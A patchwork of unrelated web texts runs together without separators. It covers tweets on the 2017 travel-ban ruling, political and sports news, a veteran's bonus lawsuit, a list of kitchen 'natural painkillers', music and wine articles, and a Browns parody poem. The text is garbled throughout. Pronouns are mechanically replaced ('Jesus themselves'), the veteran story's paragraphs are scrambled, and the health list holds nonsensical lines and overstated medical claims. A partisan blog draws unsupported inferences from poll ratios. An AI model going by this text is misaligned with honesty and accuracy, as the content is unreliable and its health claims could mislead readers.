Let's not lose sight of the fact that President Trump's #MuslimBan is a massive boost to ISIS recruiting. He's playing into their hands. — Jason Kander (@JasonKander) June 26, 2017
This #SCOTUS decision on #Muslimban is crazy. So refugees who are fleeing violence & death have to prove bonafide relationships to US? ???? — Linda Sarsour (@lsarsour) June 26, 2017
Well, the idiotic travel ban is being upheld by the lunatic members of the Supreme Court. JFC! — Jeri Henson Dies (@BionicBlonde) June 26, 2017
Parts of the travel ban have been upheld by the Supreme Court. This is NOT our America. — Arlitta Rodriguez (@ArlittaR) June 26, 2017
I'm disturbed. Many Americans are celebrating the "Muslim Ban." Muslims represent 1/4 of global population. The U.S. turns against humanity. — Dr. Craig Considine (@CraigCons) June 26, 2017
BREAKING news-we're f***ked… travel ban upheld by supreme court! — Tequila Minsky (@teqminsky) June 26, 2017
Christians who celebrate the Supreme Court decision to allow part of the "Muslim Ban" forget that Jesus themselves was a refugee/migrant. SMH. — Dr. Craig Considine (@CraigCons) June 26, 2017
This doesn't mean there isn't a great deal of support for the Supremes' decision and for President Trump's travel EO.
.@POTUS said top priority is to keep the American people safe. As they said today's SCOTUS ruling is a "clear victory for our nat'l security." pic.twitter.com/0GURHQCBne — Vice President Pence (@VP) June 26, 2017
Establishment used to rail against @realDonaldTrump. Now Supreme Court judges back them and America will be a little bit safer. #MAGA https://t.co/Yp4FgosXny — Nigel Farage (@Nigel_Farage) June 26, 2017
The Supreme Court rightly determined we have no constitutional obligation to let folks into the country who want to blow us up. — toddstarnes (@toddstarnes) June 26, 2017
Today's SCOTUS ruling on the #TravelBan validates @POTUS's firing of #SallyYates for refusing to implement the ban. — John Cardillo (@johncardillo) June 26, 2017
The New York Republican slams the Kentucky senator for their vote on Sandy Aid. | AP Photos King: Paul 'perpetuating this big lie'
While reconciliation between Sen. Rand Paul and New Jersey Gov. Chris Christie could be on the horizon, it doesn't seem as likely for the Kentucky Republican and Rep. Peter King.
“He's perpetuating this big lie, talking about pork and somehow trying to demean Gov. Christie because they fought so hard for their state, or me, because I fought so hard for mine,” the New York Republican told CNN's Wolf Blitzer on Wednesday, once again accusing Paul of being an “isolationist” and slamming them for their vote on Sandy Aid.
Story Continued Below
King and Paul's spat started Sunday, when King slammed Paul for their praise of NSA leaker Edward Snowden, as well as the infamous “isolation streak”
( PHOTOS: Rand Paul's career)
“Aid to Egypt has nothing to do with aid to Long Island, or New Jersey. They're two separate issues and they should know the difference between Egypt, Long Island and New York … Sen. Paul claims to be a great friend of Israel but yesterday the ambassador to Israel … said that continuing American aid to Egypt is essential to maintain the peace process and maintain the Egyptian-Israeli peace agreement that was negotiated under President Carter over 30 years ago,” King told Blitzer. “So it's very easy to say ‘cut this, cut that,' you can have an intelligence debate about it, but so far they haven't shown very much intelligence.”
There are two important ratios to remember 65/35 and 55/45.
Throughout the past year those who have followed political opinion will note the consistent and reoccurring appearance of these two sets of statistical ratios.
♦ First, a variant of the ratio “65/35” shows up in random series of obscure polling questions done by alternative or social media. Three examples include two Bravo Network broadcasts asking for voter input, and another from data tech “Zip App“.
The Bravo Network were so stunned by the (65/35) results of their initial poll – they actually repeated it just to make sure.
… “the results of this poll even more surprising is that the demographics of Bravo viewers are far different than the average stereotype of Donald Trump supporter” (link)
However, it should also be noted “65/35” shows up again in the NBC poll daddy result from the Commander-in-Chief forum.
As the creator of Zip App outlines the key baseline metric is 400 random input opinion results. Once the data reaches 400 results, the resulting ratio rarely changes even with exponential increases in responses to the hundreds of thousands.
♦ The second ratio “55/45” – is a consistent ratio which shows up on within media comparative opinions which are more traditionally driven. Viewership of the Convention speeches (32.2M Trump -vs- 27.8M Clinton), is one 55/45 example. Non-adjusted battleground polling (raw data not modified) is another example of 55/45 showing up.
It's an odd dynamic to find two consistent ratios “65/35” and “55/45” showing up repeatedly and predictably depending on the collection source. Non-traditional, or social media, matrices delivering “65/35”; and traditional matrices delivering “55/45”.
Within those two ratios there's a pattern of consistency beyond random data. In essence, they appear too frequently to be just arbitrary coincidence.
Of course, all of the above examples are outside of the media's ability to influence them; and quite obviously there's no limiting denomination, no set of eligibility standards, to exclude anyone participating by giving their opinion. It's just raw opinion data.
However, all of that said – those opinion levels still exist, regardless of anyone's ability to filter it. And perhaps that's why we see the New York Times quietly going back to their research mode in an effort to quantify the potential for a landslide Trump victory.
The NYT already publicly shared once before (June '16) they were evaluating an entirely new political dynamic – SEE HERE – when they announced an adjustment to the 2012 exit poll voter data, and admitted non-white voters were statistically less influential than previously espoused. You might remember this part of their analysis:
(source)
In their latest publication the Times is revealing how the scope of the Trump vote improves almost exponentially with higher turnout amid those who historically vote the least.
[…] At the individual level, education and income are still two of the strongest predictors of whether someone will turn out at the polls.
“Most of the differences between people who vote and those who don't vote can be accounted for by motivational reasons — levels of political interest and engagement,” said Benjamin Highton, a professor of political science at the University of California, Davis. “And levels of political interest and engagement are strongly correlated with education and income.” (read more)
In essence what the New York Times outlines is that if the general election has a higher turnout, which includes increases amid those groups who have the lowest traditional turnout, Trump will capture an exponentially large segment of that new voter bloc – because the identified Trump base is within those marginalized groups who have traditionally voted the least..
And Trump would benefit…
By a ratio of….
Wait for it….
Yup, “65/35”.
Say hello to the Monster Vote.
Go figure.
The key is going to be Monster Vote registration. If we can get massive numbers of new voters registered, the benefit for our objective should carry within the same ratio 65/35. We need to do everything within our power to ensure everyone is registered to vote. More on that will follow…
Advertisements
The American midfielder notched a goal and an assist for the USA against Mexico midweek, then scored for Toronto FC on Saturday.
CONCACAF Player of the Week
Michael Bradley
AGE 26 POSITION Midfielder
TEAM
USA/Toronto FC WEEK IN NUMBERS
APPS (GOALS SCORED) 2 (2) TIME ON PITCH 163 PREVIOUS WINS 0
USA 2-2 Mexico Columbus Crew 0-2 Toronto FC
Michael Bradley played a more attacking role for Jurgen Klinsmann's United States national team, and it worked out. "An imperious performance. A goal and an assist, and looked the best player on the pitch for either team by a country mile otherwise," wrote Goal USA's Keith Hickey, giving the Toronto FC man a 4.5 out of 5 in the player ratings for the USA's 2-2 draw against Mexico.
"Playing a new role at the top of Jurgen Klinsmann's midfield diamond, Bradley delivered a goal and an assist in the USA's 2-2 draw with Mexico on Wednesday. After opening the scoring by stabbing home a corner kick at the far post, Bradley used their head to set up a Chris Wondolowski strike. They then carried that form back to their club Saturday, scoring from a tight angle to bag their first goal for Toronto FC and spark a 2-0 win at previously unbeaten Columbus," wrote Goal USA's Thomas Floyd.
It served as a reminder of how versatile Bradley can be and just how important they are to the United States. Despite the early stage of the season, he's already of utmost importance to their club as well, and the week will help assuage concerns a move back to North America could dampen their form ahead of the World Cup.
When Machado reenlisted, they automatically received an honorable discharge for their previous service. That reenlistment ended in a less-than-honorable discharge.
"The bonus is supposedly for my service while deployed," they said.
But when they left the Army and applied for their Welcome Home Bonus, the state treasurer denied the benefit.
Machado grew up in Peabody. They enlisted in the Army after 9/11 and deployed to Afghanistan. They earned the Combat Infantry Badge, the Afghanistan Campaign Medal with Campaign Star and the NATO Medal. They later earned an Army Good Conduct Medal, which shows that they had no disciplinary issues in their first three years of service.
"They gotta look at all the circumstances surrounding the situation before they go ahead and start closing doors on veterans," they said.
Among them is Jeffrey Machado. He's one of two Massachusetts veterans now suing state Treasurer Deb Goldberg, saying that they were unjustly denied their bonuses after serving in Afghanistan.
An unprecedented percentage of post-9/11 veterans have received less-than-honorable discharges. Often, it's because of misconduct related to post-traumatic stress disorder or traumatic brain injury. Sixty-two percent of service members separated for misconduct from 2011 to 2015 had been diagnosed with PTSD, TBI or another mental condition.
But thousands of veterans have not received this bonus because of less-than-honorable discharges.
Massachusetts recognizes the sacrifices of those who have been deployed in the military since 9/11 with a Welcome Home Bonus . It's a grant of up to $1,000 each time a service member serves honorably in Iraq or Afghanistan, and $500 to each service member who serves at least six months on active duty.
"They gotta look at all the circumstances surrounding the situation before they go ahead and start closing doors on veterans."
By then, war had taken a toll on him.
"I started having a lot of issues sleeping. Several suicidal ideations and attempts," they explained. "Eventually, I tried going to my unit for help. That kind of fell on deaf ears for awhile. Then, the situation at home starting getting rocky as well. Things just became volatile. I went to seek help from the Army several times, and they just brushed it off, brushed it off, until I had a particular incident with my wife at the time in the car with me."
They tried to take their life.
"She attempted to essentially stop me from running off the road in the vehicle, and I used force to get them away from the steering wheel and kind of subdue them — grabbed them by the throat," they said.
Machado acknowledges that what they did was wrong. They were later diagnosed with PTSD and TBI. The Department of Veterans Affairs found them 100 percent disabled based on those service-connected wounds.
Dana Montalto, an attorney with Harvard Law School's Veterans Legal Clinic, is representing Machado and another Afghanistan veteran from Massachusetts suing for their bonus.
"People can get a less-than-honorable discharge for a whole range of reasons, from really minor misconduct to things that are more serious," Montalto explained. "Common issues that we see for many service members are struggling with mental health disorders after they return from a war zone."
That's what happened to Machado. They were flagged for investigation related to altercations with their wife. They were ordered not to contact them When they tried to text and call them after being released from in-patient psychiatric hospitalization, their command initiated separation and court-martial proceedings that led to their discharge under "other-than-honorable" conditions. Machado then made a deal.
"I would essentially walk away from the Army with an 'other-than-honorable,' and they wouldn't go forward and prosecute or do anything," they explained. "Which, at the time, sounded like a great idea because, at the time, they had me locked up at the brig when I should have been still in the hospital."
Montalto argues that Machado's final discharge is irrelevant for the purposes of their eligibility for the Welcome Home Bonus.
"The Department of Veterans Affairs has found that their service actually was honorable, and it's actually providing them some health care and supportive services," they said. "It's only the commonwealth that has decided to withhold that recognition in this particular case."
Montalto said only Machado's prior period of service, which the Army had characterized as honorable, should be taken into account for the bonus.
"Both of the veterans who we're working with faced challenges later on in their service that eventually led to what's known as a 'bad-paper discharge,' but that's really not relevant to the case here," they explained. "The fact is that the Massachusetts Legislature chose to reward deployments that were honorably completed, which both of these veterans did."
Montalto estimates that 4,000 Massachusetts veterans are in a spot similar to Machado: They served honorably, were discharged honorably when they reenlisted, and many then struggled to cope with PTSD, TBI or other wounds of war that led them to run afoul of military discipline.
The state treasurer's office is declining to comment, citing the lawsuit.
Pain management encompasses pharmacological, non-pharmacological, and other approaches to prevent, reduce, or stop pain sensations.
However, today we will focus on the natural ones located in our kitchen.
Pain is a must. In fact pain serves as an alert to potential or actual damage to the body. The definition for damage is quite broad. Pain can arise from injury as well as disease. After the message is received and interpreted, further pain can be counter-productive. Pain can have a negative impact on a person's quality of life and impede recovery from illness or injury. Unrelieved pain can become a syndrome in its own right and cause a downward spiral in a person's health and outlook. Managing pain properly facilitates recovery, prevents additional health complications, and improves an individual's quality of life.
Though research on herbal remedies is still in its early phases, many herbs are thought to provide pain management and decrease inflammation.
In our kitchen we can find natural painkillers that will ease our pain.
1. Ginger
Ginger has been used medicinally for thousands of years in Ayurvedic medicine in India as natural anti-inflammatory food. Dr. Krishna C. Srivastava, a world-renowned research on the therapeutic effects of spices, at Odense University in Denmark has also conducted extensive research into the anti-pain effects of ginger.
In one study, Dr. Srivastava gave arthritic patients small amounts of ginger daily for three months. The majority of people had significant improvements in pain, swelling, and morning stiffness by eating ginger daily.
2. Cloves
Cloves are the dried flower buds that come from the Evergreen clove tree. Cloves and clove oil are used in cooking, perfumes and flavorings, and have a sweet, warm flavor and smell.
However, this fresh-tasting spice is naturally antibacterial and anti-inflammatory, and is therefore not only useful in the kitchen but also as a herbal medicine. Cloves are beneficial for pain relief, especially for the teeth and gums, and help to reduce inflammation, which is associated with many chronic diseases.
3. Apple cider vinegar
Vinegar is made when fresh, naturally sweet cider is fermented into an alcoholic beverage (hard cider). Then it is fermented once again. The result is vinegar. Apple cider vinegar contains more than thirty important nutrients, a dozen minerals, over half a dozen vitamins and essential amino acids, and several enzymes. Plus, it has a large dose of pectin for a healthy heart.
It is also an old time home remedy that really delivers relief when you need it. It is a weak acid and has been used as a medicine/antiseptic for thousands of years. In the year 400 B.C., Hippocrates, the father of medicine, used vinegar to treat their patients. This naturally occurring germ killer was one of the very first medicines.
4. Garlic
Garlic, known to some as the stinking rose, is used by many cuisines around the world to add flavor to food, but it's also been used as a natural medicinal ingredient for centuries, both in its fresh plant form and as a supplement.
Garlic has antioxidant and anti-inflammatory properties that may help with arthritis and other pain. For example, a 1999 study published in the “Soviet Archives of Internal Medicine” found that a garlic preparation taken twice a day for four to six weeks can work just as well as conventional therapy for rheumatoid arthritis.
Research also shows that garlic is responsible for lipid-lowering, anti-blood coagulation, anti-hypertension, anti-cancer, antioxidant and anti-microbial effects.
5. Cherries
Fruit Advantage Tart Cherry is a nutritious, all-natural alternative for people in the U.S. who suffer from arthritis and other chronic joint pain. Recent research has shown that tart cherries contain powerful antioxidants that may help relieve the pain of arthritis and gout and also protect the body against cardiovascular disease and inhibit cancer tumors.
Researchers believe that the pain relief may not come from a specific antioxidant in cherries, but may come from the synergistic effect of all the natural compounds in cherries. Tart cherries are well known to contain antioxidants including melatonin. In addition, cherries contain at least 17 natural compounds.
6. Fish oil
Even more important than the president are the omega 3 fats found in oily fish, particularly mackerel, tuna, salmon, sturgeon, mullet, bluefish, anchovy, sardines, herring, trout, and menhaden. They provide about 1 gram of omega-3 fatty acids in about 3.5 ounces of fish.
Fish oil is used for a wide range of conditions. It is most often used for conditions related to the heart and blood system. Some people use fish oil to lower blood pressure or triglyceride levels (fats related to cholesterol). Fish oil has also been tried for preventing heart disease or stroke. The scientific evidence suggests that fish oil really does lower high triglycerides, and it also seems to help prevent heart disease and stroke when taken in the recommended amounts. Ironically, taking too much fish oil can actually increase the risk of stroke.
When fish oil is obtained by eating fish, the way the fish is prepared seems to make a difference. Eating broiled or baked fish appears to reduce the risk of heart disease, but eating fried fish or fish sandwiches not only cancels out the benefits of fish oil, but may actually increase heart disease risk.
7. Yogurt
Our body needs to have a healthy amount of good bacteria in the digestive tract and many yogurts are made using active, good bacteria. One of the words you'll be hearing more of in relation to yogurt is ”probiotics.” Probiotic, which literally means ”for life,” refers to living organisms that can result in a health benefit when eaten in adequate amounts.
Adequate nutrition plays a major role in the prevention and treatment of osteoporosis, and the micronutrients of the greatest importance are calcium and vitamin D.
8. Turmeric
Turmeric, the spice that gives curry its distinctive flavor and coloring has plenty of pain-relief benefits. New research suggests that turmeric possesses anti-inflammatory and anti-cancer properties and also helps to improve circulation and prevent blood clotting. Turmeric has been used in traditional medicines for easing the pain of sprains, strains, bruises and joint inflammation, as well as for treating skin and digestive issues. The healing power of turmeric comes from its active ingredient – curcumin, which lowers the levels of two enzymes in the body that cause inflammation.
Keep a jar of the powdered spice in your kitchen and add a little to your cooking in place of salt and pepper. Turmeric is also sold in supplement form.
9. Oats
Oats, via their high fiber content, are already known to help remove cholesterol from the digestive system that would otherwise end up in the bloodstream. Now, the latest research suggests they may have another cardio-protective mechanism.
They have been seen to play a role in easing menstrual cramps and bring relief from endometriosis. Oats are loaded with the anti-cramping mineral, previously mentioned, magnesium. They are also one of the best sources of dietary zinc for women who suffer from painful periods.
Oats are harvested in the fall but are available throughout the year and can add extra nutrition to a variety of healthy dishes.
10. Pineapple
As the temperatures heat up, we enrich our daily diet with one of the best tropical super fruit also known as pineapple.
Bromelain, an enzyme found in the stem of pineapple, works like heavy-duty anti-inflammatory pharmaceutical drugs, but without the side effects. It possesses incredibly potent inflammation-fighting powers.
When bromelain reaches your bloodstream, its proteolytic enzymes consume the protein gunk that causes inflammation, while simultaneously driving down your body's production of joint-inflaming chemicals.
There are many superfoods in our surroundings that will clear our brain and body from toxicity we injest every day. We just have to educate and read more.
Sun Kil Moon's Mark Kozelek has scaled back their musical operations considerably over the last decade or so. He's built one of modern music's richest catalogs dating back to 1992 — when their first album with Red House Painters was released — but since starting Sun Kil Moon in 2002, their live performances have been almost exclusively solo affairs (not counting their wonderful performance on Fallon with the Roots), and recently, even their recorded work has grown sparer (not counting their terrific collaboration with Desertshore), to the extent that their recent LPs rarely feature anything more than their voice and acoustic guitar. As I noted in our “Counting Down: Mark Kozelek” feature, it appeared as though they were unlikely to expand operations anytime soon, if ever. But appearances can be deceiving: According to a news post on Sun Kil Moon's site, Kozelek has teamed with the Album Leaf's Jimmy LaValle for a 2013 release called Perils From The Sea; the new album will be credited to Sun Kil Moon & The Album Leaf, and will be released on Kozelek's Caldo Verde label next May. Kozelek has been playing a handful of the album's tracks (“You Missed My Heart,” “Ceiling Gazing,” “Caroline,” and “Baby In Death Can I Rest Next To Your Grave”) at recent live shows, sans accompaniment. However, the new band have lined up two 2013 dates in advance of the album's release — at UE Festival in Holland on May 11, and at Shepard's Bush Empire in London, May 13. (Followed by a US tour perhaps? Please?) Here's the release in full:
‘Perils From The Sea' is the debut collaboration by The Album Leaf's multi-instrumentalist Jimmy LaValle and Sun Kil Moon singer Mark Kozelek. The project began on Sept 11, 2011, when Kozelek, a fan and acquaintance of LaValle, asked Jimmy to co-write a song. LaValle, a long time admirer of Kozelek's work, said yes, and the track ‘What Happened To My Brother' came together quickly. Pleased with the results, the two agreed to record an entire album. Kozelek and LaValle continued to work together over the following year, until ‘Perils From The Sea' was completed. For the album LaValle chose a more minimalist approach to the music than The Album Leaf's large sonic soundscapes. The lyrics to the song, ‘You Missed My Heart', Kozelek says were inspired by a nightmare they had in an Ontario hotel room. Kozelek's story-telling narratives playing against LaValle's hypnotic synth sounds and drums beats should come as a pleasant surprise to fans, and should serve as a great introduction to those previously unacquainted with these prolific and acclaimed artists. “Sun Kil Moon & The Album Leaf” will play their debut concert at UE Festival, Dordecht, Holland May 11, and an additional show at Shepard's Bush Empire, London, May 13.
In other SKM news, Kozelek will release a covers album, Like Rats, next February, which will feature their signature variations on numbers by Bad Brains, Misfts, Sonny & Cher, and more. The title track is almost definitely the Godflesh classic (from 1989's Streetcleaner), and I honestly can't imagine what he's doing with that one because it's got like eight words total (“BREED! LIKE RATS!”). Still, Koz and Godflesh main dude Justin Broadrick have worked together a bunch in the past, so it makes sense. Kind of. Check out their cover of Bad Brains “I” here.
Perils From The Sea is out 5/14, and Like Rats on 2/19, both via Caldo Verde.
WHEN A WINE is extremely rare and sought after, oenophiles often refer to it as a unicorn. It may be from a very old vintage, a very small vineyard or a place in the world few wine drinkers can find on a map. I recently spent a few weeks tracking down a unicorn of a different sort: first-rate, varietally correct and reasonably priced domestic Pinot Noirs.
With hundreds of Pinot Noirs produced in this country each year, and acreage devoted to the grape ever increasing, this may not sound like a true unicorn quest, but as Daniel Posner, proprietor of Grapes The Wine Company, in White Plains, N.Y., can attest, wines with these qualities can be very rare. In fact, Mr. Posner said they have to taste at least 100 domestic Pinot Noirs to find five that they deem worthy to put on their store shelves.
“It's not like shooting fish in a barrel,” Mr. Posner said of finding high-quality domestic Pinot Noir under $40. A good bottle can easily cost twice as much. That's because Pinot Noir, a native of Burgundy, France, is a hard grape to get right. Regularly described by even its biggest fans as finicky, thin-skinned and temperamental, Pinot Noir is the globally acknowledged diva of grapes. As Dave Keatley, winemaker at the Sonoma-based Flowers Vineyards & Winery, a notable Pinot producer, said, “Pinot Noir is a grape you can't cut corners with.”
Mr. Keatley produces some of the top Pinots in Sonoma, including a reasonably priced ($38) Sonoma Coast bottling whose fruit is sourced from almost 20 vineyards in the region. A good Pinot isn't just a matter of finding great fruit, according to Mr. Keatley, but fruit from diverse sites. A variety of vineyard sites can contribute different aromas, textures and structures, they said, whereas Pinot Noirs made from large appellations can seem one-dimensional.
Unlike hardier, more flexible varieties, such as Cabernet and Syrah, fragile Pinot Noir requires the exact right circumstances to thrive. A long, cool growing season (but not too long or too cool) is necessary for the grape to develop its trademark acidity and aromatically beguiling, even ethereal, profile and its delicate yet vibrant fruit. Pinot requires constant adjustment and attention in the vineyard (just the right amount of shade and sun) and careful handling in the winery as well—with many winemaking decisions made along the way (e.g., destemming and cold soaking pre-fermentation). A difficult wine to make to scale, Pinot has to be made artisanally even in large quantity, said Mr. Keatley.
Some of the places the grape grows best also happen to be places “rich people like to build homes,” said Joshua Klapper, which adds to the scarcity of prime Pinot acreage. Mr. Klapper crafts Pinot Noir in the Santa Maria Valley, under the La Fenêtre Wines label. “It's coastal, it's on a slope, it's on a hillside,” they said, referencing the kinds of places great Pinot is planted.
Mr. Klapper makes a range of the wine, including the affordably priced À Côté, made from fruit sourced partly from Santa Barbara County but mostly from Monterey County, where it is much more affordable. In either place, it's tough to find vineyards that will produce compelling wines in the $20 to $25 range, said Mr. Klapper, who has done their fair share of searching.
While not all of California's Pinot Noir vineyards may produce memorable wine, the category is certainly hot. As of 2014, nearly 49,000 acres in California were planted to Pinot compared with 24,442 acres in 2005, the year after “Sideways,” that famously pro-Pinot movie, made its debut. (Yes, winemakers still reference that movie.)
In Oregon, Pinot Noir accounts for over 60% of the state's wine production. Acreage planted to Pinot more than doubled in 10 years there, too: 17,146 acres in 2014 versus 7,637 in 2004. Even more will be planted in 2015, according to Michelle Kaufmann of the Oregon Wine Board.
The consumer appetite for Pinot Noir is so strong that Constellation Brands recently paid an astonishingly high $315 million for Meiomi, one of the leading brands of affordable Pinot Noir. The brand didn't exist 10 years ago, and what is particularly remarkable is that the purchase price doesn't include even an acre of vineyard land. The grapes are purchased from Pinot vineyards around California.
The Meiomi Pinot Noir was among the 24 bottles I purchased for my tasting. I focused on Pinot Noirs ranging from $15 to $40 a bottle. I deliberately didn't go below $15 because I've found it next to impossible to find an interesting domestic Pinot at that price. A pleasant red wine, perhaps, but not a wine with true Pinot character.
“ Well-produced, reasonably priced domestic Pinot Noirs may not be mythical, but it takes some sleuthing to uncover them. ”
I bought wines from all over California (Sonoma Coast, Russian River, Santa Barbara) as well as Oregon. The latter can be a particularly good source for inexpensive Pinot Noir in an outstanding vintage, according to Ian Dorin, wine director of Wine Library in Springfield, N.J., who thinks Oregon delivers the “best bang for the buck” in reasonably priced Pinot Noir.
I did have a few terrific Oregon Pinot Noirs in both excellent (2012) and good (2013) vintages. The 2012 Rex Hill Willamette Valley was smoky and rich with a savory edge and at $24 is a very good deal. A lighter, more feminine wine, the 2012 Illahe Percheron Willamette Valley ($38), was pleasant if slightly thin. The 2013 Walter Scott La Combe Verte Willamette Valley ($29) was well-balanced, with terrific acidity, and the 2013 Domaine Drouhin Dundee Hills ($32) was also quite good—crisp and savory with notes of bright red and dark fruit.
Among the California Pinots, the opposite was true vintage-wise: 2013 was a stellar Pinot Noir year while 2012 was good. I found some excellent bottles from both years, however. Many of the California Pinots, particularly those $20 and under, tasted confected or overly ripe—more like soft, sweetish red wines than true Pinot Noirs—and a few had powerful alcohol levels, more commonly associated with Cabernet. Michael Davies, executive winemaker of Rex Hill, called this last style of Pinot Noir “untethered, like a big hot-air balloon,” a description I thought colorful and quite apt.
A handful of Pinot Noirs truly stood out: the elegant 2013 Flowers Sonoma Coast Pinot Noir ($38), a strikingly lush and deeply flavored 2012 La Fenêtre À Côté Central Coast Pinot Noir ($22) and the 2012 Willowbrook Russian River Valley($32), which was quite polished and suave. I also found a lively, red-fruit inflected 2012 Hartley Ostini Hitching Post Cork Dancer Pinot Noir Santa Barbara County ($28) and a juicy 2013 Hahn SLH Pinot Noir ($24), from the reliable Monterey-based estate.
With nine of the 24 Pinot Noirs I purchased showing quite well, I had greater proportional luck than Mr. Posner. On the other hand, I benefited from Mr. Posner's selection, as several of my top picks came from their store. Maybe reasonably priced, well-produced, domestic Pinots with true varietal character aren't mythical, but they still require a fair amount of sleuthing to uncover—and on the part of their winemakers, a great deal of work.
Oenofile // Five First-Rate, American Pinot Noirs for Less Than $40 From left: 2012 Rex Hill Willamette Valley Pinot Noir; 2013 Flowers Sonoma Coast Pinot Noir; 2012 La Fenêtre À Côté Central Coast Pinot Noir; 2012 Willowbrook Russian River Valley Pinot Noir; 2013 Walter Scott La Combe Verte Willamette Valley Pinot Noir Photo: F. Martin Ramin/The Wall Street Journal
2012 Rex Hill Willamette Valley Pinot Noir $24
The 2012 vintage was a great success story for Oregon vintners, and this basic bottling from Rex Hill is an excellent example of the concentration and lushness emblematic of the year. Full-bodied and rich, it is marked by notes of dark fruit, earth and even a bit of a tobacco.
2013 Flowers Sonoma Coast Pinot Noir $38
Winemaker Dave Keatley was one of many Sonoma Coast Pinot Noir producers pleased with the outstanding quality of the wines from the 2013 vintage. This wine is a vibrant example of the year—elegant and supple with bright red fruit aromas and a fine mineral thread.
2012 La Fenêtre À Côté Central Coast Pinot Noir $22
Winemaker Joshua Klapper turns out pricier Pinots under the La Fenêtre Wines label, but their À Côté Central Coast bottling is no less of a win. In fact, this impressively weighty but beautifully polished Pinot is a terrific bargain at this price.
2012 Willowbrook Russian River Valley Pinot Noir $32
Marked by bright red berry fruit and a lively acidity, this medium-bodied Pinot from the heart of the Russian River Valley, made by a producer specializing in Chardonnay and Pinot Noir, is a terrific wine to accompany food.
2013 Walter Scott La Combe Verte Willamette Valley Pinot Noir $29
“La Combe Verte” (the green valley) is a tribute to Oregon producer Patricia Green's team. Oregon's 2013 vintage was more difficult than the stellar 2012, but producers like Walter Scott turned out Pinots like this brisk, pleasant wine.
See wine videos and more from Off Duty at youtube.com/wsj.com.
Email Lettie at wine@wsj.com
By: Bryce Rossler | December 23, 2017 8:53 am ET
Twas the day before Christmas, and in bad weather,
Not a real player was stirring, not even Tretter,
Their chinstraps buckled to their helmets with care,
In hopes that Hue would soon no longer be there.
The Haslams were nestled all snug in their beds,
While visions of fed cases danced in their heads,
And Peppers in their arm sleeve, and I in my cap,
Had just settled down for an offseason's nap.
When out on the field there arose such a clatter,
I sprang from my couch to see what was the matter,
Away to the TV I flew just like Flash,
Tore off my jersey, my remote I did smash.
Will the Browns really go winless this season?
An embarrassing year, Hue Jackson's the reason,
When what to my wondering eyes did appear,
But John Fox and the Bears, their first win may be here!
With a terrible head coach, brazen and clueless,
I knew long ago the Browns must be Hue-less,
More rapid than John Ross, their pressers they came,
And they whistled, and shouted, and called them by name,
“Now, GRIFFIN! Now, KESSLER! Now, MCCOWN AND OSWEILER!”
“On, KIZER! On, HOGAN! AGAIN KIZER AND KESSLER!”
To the top of the draft! Why didn't Mahomes fall?
Picks for AJ McCarron? Why, I'd trade them all!
The first key to victory will be stopping the run,
But even if they win, Hue needs to be done,
Make them play through the rookie, Mitchell Trubisky,
Pressure them often and their throws will be risky!
By taking away the run, you'll force them to throw,
Their wideouts are bad, he'll have nowhere to go,
Create turnovers, dampen the home crowd's spirit,
If Hue coaches the Browns home opener next year, none will be there to cheer it!
Cancel your season tickets if they don't beat the Bears,
Win the turnover battle, Deshone Kizer take care!
Beware of the crosswinds, keep the throws safe and short,
I still don't know why Hue has Haslam's support.
The ball will be slippery, they must avoid fumbling,
Thirty games into their tenure, Hue is still bumbling,
Their O is bad, give them not good field position,
Make them drive a long ways, in winter conditions!
They must run the ball well to win their first game,
Crowell needs more carries, but Hue has no shame,
In neutral game script, their run ratio first ranks,
If they keep the game close, they can play to their strengths!
The Browns actually rank fourth in yards per carry,
Run the ball lots and their day shall be merry,
If they do not, shove Hue Jackson up a chimney,
Richardson was forced to sell, I wish it was Jimmy!
If they win, across my living room I'll prance,
With the Steelers looming, this is their best chance,
To make the nice list and avoid getting coal,
But no matter what, send Hue to the North Pole!
If they lose, they'll still get Mayfield or Rosen,
It doesn't matter so long as Hue can't coach them,
But I heard Hue exclaim as they drove out of sight,
“To Cincy I go, Kizer won't ever be right!”
CLOSE Givani Smith and Jeff Blashill talk Sunday at Centre Ice Arena in Traverse City. Video by Helene St. James/DFP Videolicious
Givani Smith during the Red Wings' developmental camp for prospects July 9, 2016, in Traverse City. (Photo: Brandon Folsom, Special to the Free Press)
TRAVERSE CITY -- Givani Smith has a way of making an impression.
On the ice, they are 6-foot-2, 200 pounds of energy, bulldozing their way to the net and into corners. Off the ice, they radiate exuberance with their irrepressible smile.
Smith spent today at Centre Ice Arena impressing during skating tests that served as entertainment on Day 3 of Detroit Red Wings training camp, and will suit up for the Monday's Red and White game, after which the Wings return to Detroit.
The Wings drafted Smith this past June, in the second round, after watching them rack up 23 goals and 146 penalty minutes last season for their junior team, Guelph. They have a reputation for never taking a night off, and for pushing himself.
“The thing about Givani that impressed me is that they have an idea of what is going to separate them from the rest of the crew,” Wings coach Jeff Blashill said. “He knows he's not going to maybe toe-drag as well as some other guys, but he's going to be physical and he's going to go to the net-front to produce offense. Guys that like to do that are few and far between. They seem to like to do that, so that's a positive for him.
“He led most of the skating tests, I was impressed with that, that means he's in great shape. He's done a good job. We're going to play them in an exhibition game and I'm excited to see that. When you're playing against somebody else, it's a lot easier to be physical and I know that's a big part of their game.”
Smith models their game after their idol Wayne Simmonds, and, said that “ever since being drafted by the Red Wings,” he'd also been studying Justin Abdelkader.
“I'm a physical player, I think of myself as a power forward,” Smith said. “I like to get pucks deep and hit guys and bring pucks to the net. I see myself as a net-front type of player, standing in front of the net and tipping pucks, and also battling in the corners.
“I like to grind guys down a little, get them off their game. Just playing hard in all areas of the ice.”
Smith said once he's back in juniors they plan to work skill and speed. It's a guarantee he'll be smiling while doing so, because that's part of their nature.
“Yeah, it's great energy,” Blashill said. “He's a positive person. The first time I met him, they had a smile and they were really, really big. I like both those things.”
Contact Helene St. James: hstjames@freepress.com. Follow them on Twitter @helenestjames. Check out our Red Wings Xtra app on Apple and Android!
The St. Louis Cardinals have "floated" right-hander Michael Wacha's name in trade talks, reports Ken Rosenthal of Fox Sports.
Wacha was 7-7 with a 5.09 ERA and 1.48 WHIP in 27 games last season, 24 of which were starts. The 25-year-old struck out 114 batters and allowed 45 walks in 138 innings.
Rosenthal writes that it's unlikley the Cardinals would get much in return for Wacha. In addition to their not-so-great numbers last season, Wacha has a history of injury to their pitching shoulder. They were placed on the 15-day disabled list in August with right shoulder inflammation, an injury that had similar symptoms as the stress reaction to their scapula in 2014. There were fears that the stress-reaction injury could present chronic problems.
An All-Star in 2015 and the MVP of the 2013 National League Championship Series, Wacha is eligible for arbitration this offseason.
-- Alex Tekip
NAIROBI (Reuters) - Tanzania's President Jakaya Kikwete has condemned witchdoctors who kill albinos and harvest their body parts in the hope it will bring prosperity.
